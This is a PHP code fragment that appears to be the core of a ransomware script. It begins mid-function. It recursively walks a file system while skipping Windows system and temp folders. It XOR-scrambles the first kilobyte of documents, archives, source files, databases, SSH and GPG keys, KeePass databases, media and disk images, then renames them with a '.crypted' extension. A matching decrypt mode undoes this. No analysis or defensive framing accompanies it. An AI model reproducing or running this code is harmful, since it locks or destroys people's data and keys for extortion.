if(preg_match('/'.$s.$s.'(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i',$p) || preg_match('/recycle/i',$p)) return;
$dp=@opendir($p);
if($dp===false) return;
while($o=@readdir($dp)) if($o!='.'&&$o!='..')
{
if (@is_dir($p.$s.$o))
{
Tree($p.$s.$o);
}
elseif ($a=='e'&&preg_match('/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i',$o) || $a=='d'&&preg_match('/[.](crypted)$/i',$o))
{
$fp=@fopen($p.$s.$o,'r+');
if ($fp!==false)
{
$x=@fread($fp,1024);
for($i=0;$i<strlen($x);$i++)$x[$i]=chr(ord($x[$i])^ord($k[$i%strlen($k)]));
@fseek($fp,0);
@fwrite($fp,$x);
@fclose($fp);
if($a=='e')
{
@rename($p.$s.$o, $p.$s.$o.'.crypted');
}
else
{
@rename($p.$s.$o, preg_replace('/[.]crypted$/', '', $p.$s.$o));
}
}
}
}
@closedir($dp);
}
?>
